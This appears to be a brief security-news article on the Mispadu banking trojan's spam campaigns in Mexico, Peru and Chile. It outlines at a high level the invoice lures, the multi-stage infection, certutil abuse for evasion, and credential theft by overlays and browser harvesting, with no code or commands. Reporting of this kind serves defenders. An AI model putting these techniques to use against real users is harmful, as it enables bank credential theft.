HQ/EMEAFind out how we can help your business
Researchers have linked the Mispadu banking trojan to numerous spam campaigns targeting Latin American countries like Mexico, Peru, and Chile. The primary objective of these campaigns is to steal credentials and deliver payloads to the earlier-mentioned targets.
The ongoing cybercriminal operation started in August last year after a cybersecurity group discovered the malicious activity.
Reports first documented the Mispadu campaign in November 2019. The cyberattack operation showed that the trojan operators could execute credential theft and backdoor methods, which could capture screenshots and keystrokes.
The Mispadu banking trojan showed similarities to multiple payloads.
According to investigations, the Mispadu banking trojan has abilities that exist in other banking malware that targets the same region. Moreover, cybercriminal operations involving the Delphi malware leverage email messages encouraging recipients to access fake overdue invoices. These lures could initiate a multi-stage infection process.
Once a target accesses the HTML attachment, the actors can verify that the target opened the file from a desktop machine. Subsequently, the actors will redirect the victim to a remote server to retrieve the first-stage malware.
The attackers designed the RAR or ZIP archive to use the rogue digital certificates upon launching. These actors crafted this malware to decode and run the trojan by exploiting a legitimate certutil command-line utility.
Furthermore, the threat actors included a feature in Mispadu that could collect many AV solutions installed on the infected host, harvest credentials from MS Outlook and Chrome, and aid the fetching of additional malware strains.
This ability also includes an obfuscated Visual Basic Script dropper that could download additional payload from a hard-coded domain, a dot net remote access tool, and a Rust-coded loader.
In addition, the banking trojan uses compromised overlay screens to acquire credentials associated with online banking portals and other critical details.
The certutil command-line utility method has enabled the Mispadu operators to avoid the detection of numerous security software solutions. The strategy has also allowed actors to gather over 90,000 bank account credentials from over 17,000 unique websites.
